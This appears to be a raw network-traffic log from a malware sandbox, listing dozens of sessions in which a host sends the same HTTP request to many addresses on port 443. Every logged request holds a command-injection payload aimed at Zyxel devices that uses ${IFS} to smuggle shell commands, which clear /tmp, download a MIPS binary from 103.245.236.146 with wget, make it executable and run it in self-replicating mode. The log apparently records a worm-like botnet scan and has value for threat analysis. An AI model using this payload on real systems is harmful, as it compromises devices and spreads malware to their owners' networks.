                                                        Jan 28, 2024 10:13:10.740334988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8861192.168.2.14581025.187.116.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740377903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8862192.168.2.1441872104.161.120.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740398884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8863192.168.2.1457308204.218.121.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740437031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8864192.168.2.144478292.168.163.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740468025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8865192.168.2.145812236.31.49.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740518093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8866192.168.2.1459788145.112.53.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740580082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8867192.168.2.144970867.89.110.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740607977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8868192.168.2.146026274.141.178.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740665913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8869192.168.2.1437260140.236.166.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740700006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8870192.168.2.1457246141.151.223.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740747929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8871192.168.2.1457414221.214.244.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740784883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8872192.168.2.1441196207.99.208.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740822077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8873192.168.2.144990662.77.98.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740854025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8874192.168.2.14586248.57.39.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740920067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8875192.168.2.1437456201.183.254.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740947962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8876192.168.2.1450638104.48.52.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740989923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8877192.168.2.145480498.77.178.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741014004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8878192.168.2.1448452166.175.81.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741079092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8879192.168.2.1443684102.218.39.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741120100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8880192.168.2.145320649.139.95.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741151094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8881192.168.2.1438924144.242.33.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741177082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8882192.168.2.1452140123.145.21.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741221905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8883192.168.2.1444092166.225.104.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741257906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8884192.168.2.143415058.212.38.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741295099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8885192.168.2.143341671.186.26.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741332054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8886192.168.2.1433738131.233.37.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741384983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8887192.168.2.145770273.90.223.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741406918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8888192.168.2.1445268210.154.53.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741468906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8889192.168.2.146081043.64.126.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741506100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8890192.168.2.1434526146.215.123.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741561890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8891192.168.2.1459564139.85.203.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741601944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8892192.168.2.1434566117.44.89.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741648912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8893192.168.2.1447130121.58.239.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741688013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8894192.168.2.1449092192.105.128.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741739035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8895192.168.2.1439026210.56.196.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741774082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8896192.168.2.1442876155.175.74.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741803885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8897192.168.2.1450114153.43.149.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741836071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8898192.168.2.1442264158.30.27.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741897106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8899192.168.2.1434312114.186.113.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741925955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8900192.168.2.1445758135.27.64.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.741970062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8901192.168.2.145138665.182.11.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742006063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8902192.168.2.1437762101.183.250.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742058039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8903192.168.2.144911835.209.146.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742100000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8904192.168.2.1433030158.229.124.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742144108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8905192.168.2.143933893.124.181.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742175102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8906192.168.2.145598277.94.63.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742232084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8907192.168.2.1445330113.48.234.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742250919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8908192.168.2.1436056114.98.133.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742305040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8909192.168.2.144603293.16.34.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742336035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8910192.168.2.143471449.244.244.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742394924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8911192.168.2.145770239.66.242.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742429018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8912192.168.2.143700267.20.94.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742465019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8913192.168.2.1434658166.34.145.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742510080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8914192.168.2.1448630114.142.98.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742561102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8915192.168.2.145175647.44.189.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742605925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8916192.168.2.1444022185.236.179.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742638111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8917192.168.2.1452554217.26.61.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742671013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8918192.168.2.1433906123.195.22.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742712021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8919192.168.2.146065680.126.130.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742748022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8920192.168.2.144432244.235.198.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742779016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8921192.168.2.1456892118.112.136.52443
                                                        TimestampBytes transferredDirectionData
